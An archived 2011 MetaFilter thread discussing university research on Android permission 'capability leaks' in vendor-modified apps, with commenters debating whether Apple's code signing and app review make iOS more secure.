A leaking woodpecker
December 5, 2011 3:56 PM   Subscribe

Security researchers at North Carolina State University led by Xuxian Jiang (who had previously discovered 12 malicious Android applications sold through Google's Android Market) have uncovered holes in how the permissions-based security model is enforced on numerous Android devices. Called "leaks", these vulnerabilities allow new and existing malicious applications to eavesdrop on calls, track the user's location, install applications, send SMS messages, delete data from the device, and more. (via)
posted by Blazecock Pileon (30 comments total) 9 users marked this as a favorite
 
No worries. I'm sure the ultra fast OS updating by the telcos will have this solved in a matter of only a few years.
posted by Threeway Handshake at 4:00 PM on December 5, 2011 [11 favorites]


"The consumers will pay us for the rope with which we will hang them."
posted by hank at 4:12 PM on December 5, 2011 [3 favorites]


So in light of what I learned on the recent phone OS thread, given that the Apple app store is far more restrictive than the Android Market, does that translate into more security? The link talked about code signing, but I'd agree it doesn't seem like a guarantee, do studies show this?
posted by midmarch snowman at 4:14 PM on December 5, 2011 [1 favorite]


Even if code-signing isn't a guarantee, what's Google gaining by not doing it at all? Is it expensive to implement? I'm curious if anyone outside of Google is defending Google on its response to the earlier report from Jiang's team (from the first link):

In most respects, Google leads the pack when it comes to policing the security of its users...Android is clearly an exception. The backdoor contained in the rogue applications discovered by Jiang adopted a technique that closely mimics the ”rootstrap” proof-of-concept exploit released in June 2010 by researcher Jon Oberheide. The apps actively exploited a significant omission in the Android security model that Google has shown no signs of fixing.

“This is something that's unique to Android because it doesn't have any sort of code-signing guarantees like the iPhone has,” Oberheide told The Register on Friday. “On iPhones, when you publish an app to the app market, Apple signs whatever code is distributed with the application that says you can only execute this code. You can't easily pull down new code over the internet and execute it.”

The apps discovered by Jiang were under no such restrictions, making it easy for them to pull down new code at any time that greatly expanded their capabilities...

To be sure, code signing isn't a silver bullet that completely deters apps from downloading new code and executing it at run time. Apps running on Apple's iOS theoretically could do the same thing by sneaking what's known as an interpreter into a rogue app, or by adopting a tedious developer process known as ROP, or return oriented programming. Almost no security researcher would disagree, however, that code signing significantly raises the bar to such attacks.

Code signing also helps prevent or lessen the effects of entire classes of exploits, such as those that corrupt memory.

In an email, the Google spokesman responded: "Code signing, as discussed in various public forums, does not guarantee that a malicious application cannot run untrusted code. Regardless of the platform, it doesn't prevent an application from executing code from the Internet."

posted by mediareport at 4:27 PM on December 5, 2011


It's worth noting that all but one of these vulnerabilities were introduced by the phone vendors and are not present in the stock OS. (The one exception is a bug that lets an app uninstall the text-to-speech system's installer, which normally only happens once you download the TTS data files.)

I wish they had tested Cyanogen; at least that has a better chance of seeing these kinds of bugs fixed quickly.
posted by teraflop at 4:28 PM on December 5, 2011 [2 favorites]


So, to use an analogy, it's more like a security flaw in a pre-installed copy of Internet Explorer, and less like a security flaw in Windows itself?
posted by codacorolla at 4:34 PM on December 5, 2011


Even if code-signing isn't a guarantee, what's Google gaining by not doing it at all?

You can install Android apps without going through a software store at all. You don't need to apply for a developer key to write Android software. That's a pretty big thing actually, although some people don't recognize it.

You don't need to sign code to run software on a Windows, Mac or Linux machine either. Some may regard this as a flaw. I do not.

I'm not actually sure iOS is any better. It still leaves the default root and password the same on all systems, to my knowledge.
posted by JHarris at 4:37 PM on December 5, 2011 [3 favorites]


iOS has a monetary barrier of entry, and apps have go through a review process, but there's no rigorous security check involved with getting an application on the app store. You can download malicious apps on the Apple app store: there was one that a security researcher got on there called instastock. It was removed after the press release came out about his research. Google removes malicious apps as well.

This isn't talking so much about malicious downloaded apps but about a problem with the security model of Android. Android gives you a readout of permissions before an app is installed. This article says that readout is not always accurate and many of the pre-loaded apps on custom manufacturer's images have security flaws that could be exploited.

In other words, a downloaded malicious app could say that it doesn't access SMS, and covertly send SMS messages by exploiting these bugs.

iOS has a different security model. All apps are allowed free access to the internet, but they can't send SMS or call numbers. I'm not sure about the other permissions, but I believe all non-Apple apps are treated the same. The article's analysis doesn't really apply to iOS.
posted by demiurge at 4:40 PM on December 5, 2011 [3 favorites]


given that the Apple app store is far more restrictive than the Android Market, does that translate into more security?

Recently, a security researcher Charlie Miller intentionally put up an app that "could potentially let any app download and run unsigned code" after notifying Apple of the bug a few weeks prior. After a few days up in the App Store, word got out and he was suspended from iOS development for a year.
posted by june made him a gemini at 4:42 PM on December 5, 2011 [5 favorites]


codacorolla: Pretty much. Most of the flaws were in vendor-specific software, so it's more like a bug in the custom search toolbar for IE that came pre-installed when you bought the system.
posted by demiurge at 4:42 PM on December 5, 2011


I'm not actually sure iOS is any better. It still leaves the default root and password the same on all systems, to my knowledge.

Nothing important to the user is really protected by root anyways. This really isn't an issue at all.
posted by schwa at 5:05 PM on December 5, 2011


Yeah, the only "stock" vulnerability is the one that can let an app delete another app. Not good, and probably fixed or being fixed, but not a privacy/security vulnerability per se.

This is why I recommend the Nexus phones to everyone: minimal/no bloatware, equivalent to a "clean" install of Windows vs. a Dell install of Windows.

The reference implementations from Google (i.e., the Nexus One and Nexus S)
are rather clean and free from capability leaks, with only
a single minor explicit leak (marked as 32
in Table 3) due
to an app com.svox.pico. This app defines a receiver,
which can be tricked to remove another app, com.svox.-
langpack.installer by any other third-party ap

posted by wildcrdj at 5:20 PM on December 5, 2011 [3 favorites]


(er, it is a security vulnerability, but it doesn't expose any user data or allow the app to modify data / permissions in the way some of the others do. Still would be annoying but there is less obvious "benefit" from exploiting this attack than one that exposed user data, for instance)
posted by wildcrdj at 5:22 PM on December 5, 2011


midmarch snowman: "So in light of what I learned on the recent phone OS thread, given that the Apple app store is far more restrictive than the Android Market, does that translate into more security? The link talked about code signing, but I'd agree it doesn't seem like a guarantee, do studies show this"

Given that there haven't been any iPhone viruses so far that haven't involved people jailbreaking (which is to say, enabling unsigned code to run on their iPhones), it would appear that the main alternative so far to the Walled Garden is a vacant lot full of weeds.
posted by DoctorFedora at 5:27 PM on December 5, 2011 [1 favorite]


(I should say, with the exception of proof-of-concept holes like Instastock, which are never used maliciously by their discoverers, at least so far)
posted by DoctorFedora at 5:29 PM on December 5, 2011


It still leaves the default root and password the same on all systems, to my knowledge.

By "it" you mean "certain Jailbreaks that install sshd."
posted by Threeway Handshake at 5:48 PM on December 5, 2011 [3 favorites]


"It's worth noting that all but one of these vulnerabilities were introduced by the phone vendors and are not present in the stock OS."

This appears to be correct. The paper doesn't do a particularly good job explaining the issue, IMO. From my understanding, what's happening is as follows:

On Android, apps can pass requests to other apps, e.g. an app can pass a request to the Messages app asking it to send an SMS. With the stock Android apps, the apps that are receiving the requests check to make sure that the sending app has authorization to make the request. However, many Android apps (Messages, Dialer, etc.) are replaced with modified versions by the manufacturers, and the manufacturer versions of these apps aren't checking to see that these requests are made by authorized apps, which allows any app on the system, including user-installed apps, to successfully make the requests.

This is an enormous problem, and phone-specific security issues like this will persist as long as Google lets OEMs replace crucial system services with their own (HTC in particular seems to have a very laissez-faire attitude toward security).
posted by esoterica at 6:05 PM on December 5, 2011 [3 favorites]


Given that there haven't been any iPhone viruses so far that haven't involved people jailbreaking (which is to say, enabling unsigned code to run on their iPhones), it would appear that the main alternative so far to the Walled Garden is a vacant lot full of weeds.

I'd say your analogy is scaled wrong. The "vacant lot full of weeds" would properly speaking be Windows. Android has more of a problem with malware than iOS, but it's not that bad.

Generally speaking, the more use you can potentially get out of a system, the more vulnerable it is to hacks. Apple drew that line much closer to lower functionality than Google did. (The word "generally" here is my acknowledgement that a well-designed system may not find it necessary to make a tradeoff.)

On the default username and password thing: Cydia expressly informs users that, if they install SSH, they should change the username and password, but the defaults are still there even without it. (Which may not be a problem, admittedly. If it was, I'd expect we'd have heard of more iOS hacks.)
posted by JHarris at 6:15 PM on December 5, 2011


I learned recently that Apple, Google, etc. don't recompile applications from source, creating an incredible attack vector for malicious developers.
posted by jeffburdges at 6:17 PM on December 5, 2011


I'm glad Apple does not modify the signed binaries that developers submit, especially if the app is a security utility (e.g., SSH client). If the binary is malicious or otherwise faulty, blame rests with the developer alone. In a manner of speaking, the procedure that Apple set up ensures that the custom code in a third-party app is more or less sandboxed away from other hands, including Apple's, and that strong cryptography can verify the bits that one buys from the App Store.
posted by Blazecock Pileon at 6:25 PM on December 5, 2011 [1 favorite]


On Android, apps can pass requests to other apps, e.g. an app can pass a request to the Messages app asking it to send an SMS. With the stock Android apps, the apps that are receiving the requests check to make sure that the sending app has authorization to make the request. However, many Android apps (Messages, Dialer, etc.) are replaced with modified versions by the manufacturers, and the manufacturer versions of these apps aren't checking to see that these requests are made by authorized apps, which allows any app on the system, including user-installed apps, to successfully make the requests.

Kind of. Except that the apps that somebody has installed are the ones installing other apps that can do as they please with the dialer and message programs. This is the whole signed code thing they're talking about. On a system that only runs signed code, an app can't download and run another app.
posted by Threeway Handshake at 6:53 PM on December 5, 2011


Threeway Handshake wrote: This is the whole signed code thing they're talking about. On a system that only runs signed code, an app can't download and run another app.

No. Code signing verifies that an application you downloaded came from an authorized source and has not been modified since it was signed. It does absolutely nothing to prevent a malicious program from downloading and executing any damn thing it likes. That's pretty much not possible without the store owner reviewing the source and compiling the application themselves.
posted by wierdo at 7:37 PM on December 5, 2011 [3 favorites]


I don't know if anyone has brought this up, but in case no one has:

You're all getting this wrong. The main (security) advantage conferred by code signing does not involve some higher Apple vetting process. It's not like they audit your code; if you're using a newfangled technique there is absolutely no reason why a signed binary wouldn't be able to execute code it downloaded off the internet, or mess around with any available exploits.

No, the main advantage comes from the fact that these keys cost $99 a pop, plus the effort necessary to pass the minimum app store vetting. If Apple can invalidate any keys used for nefarious binaries and thus the capital requirements make the operate way riskier to participate in.

Whether or not this guarantees higher user satisfaction is a separate conversation, but this is a consequence of economics and not superior engineering; for a few weeks back when iOS 4 came out, you could jailbreak your phone by just visiting a website!
posted by pmv at 8:50 PM on December 5, 2011


So basically the $99 for a key to install code is like the $5 we pay to become members here?
posted by ZeusHumms at 11:55 PM on December 5, 2011 [2 favorites]


ZeusHumms: Not really. It's a yearly subscription and there's no way to load your software on iOS devices without paying it (or hacking the device). So it's a Development Kit + App Store access bundle.
posted by demiurge at 7:07 AM on December 6, 2011


It does absolutely nothing to prevent a malicious program from downloading and executing any damn thing it likes.

Except when the OS will not run things that are not signed. You wouldn't be able to pull down compiled executables and then run them.

Obviously, the counterexample given is that the signed application could have an embedded interpreter, and this application could pull down something to interpret. But this is not the same thing, and is not "any damn thing it likes."
posted by Threeway Handshake at 8:34 AM on December 6, 2011 [1 favorite]


Signing is not required for restricting the actions a program can take; operating systems have for years been able to restrict programs from accessing arbitrary files, memory, or hardware devices. On Android devices the Unix operating system idea of groups has been used to implement the array of permissions that an application can have. An operating system bug or a buggy privileged program can let a malicious program perform actions it shouldn't be able to (the paper is about the latter class of problem, buggy privileged programs)

Signing does not guarantee on its own that a program can't execute arbitrary native code at runtime. For instance, if the language of the signed program is C/C++ and the execution environment is native code then all you need to do is write an exploitable buffer overflow into your code, then use this to smuggle in the desired native code. (subject to whatever OS-level mitigations of exploitable buffer overflows exist; as far as I'm aware, all of these are in the genre of partial solutions with workarounds possible in the exploiting code) However, the operating system access restrictions would prevent this smuggled code from performing restricted operations just as well as it prevented the native, buggy code from performing those operations.
posted by jepler at 10:57 AM on December 6, 2011


There are no meaningful protections against intentional buffer overflows created designed into an application written in a mid-level language like C, C++, or Objective-C, jepler. Your application simply detects a trigger like an unusual character, adds some known quantity to a stack buffer's pointer, and copies the data there instead, modifying the return address. You could even hide this inside the source code with some finesse.

In theory, Java has considerably more resistance to such attacks, especially with serious code review, but realistically, once you've compromised an object's data, any actions it might reasonably take could be taken against the user's will, i.e. spyware phoning home.
posted by jeffburdges at 3:17 PM on December 6, 2011


No, the main advantage comes from the fact that these keys cost $99 a pop, plus the effort necessary to pass the minimum app store vetting. If Apple can invalidate any keys used for nefarious binaries and thus the capital requirements make the operate way riskier to participate in.

Oh, bullshit. $99 is way too small an amount to have the kind of effect you are talking about. $99 is not an onerous capital requirement, it's not even quite enough to buy an hour of a typical iOS developer's time.
posted by ook at 4:16 PM on December 6, 2011


Oh, bullshit. $99 is way too small an amount to have the kind of effect you are talking about. $99 is not an onerous capital requirement

It is for ME.
posted by JHarris at 2:02 AM on December 7, 2011


« Older There goes the balls again!   |   “This is not a definition, it is not true—and... Newer »


This thread has been archived and is closed to new comments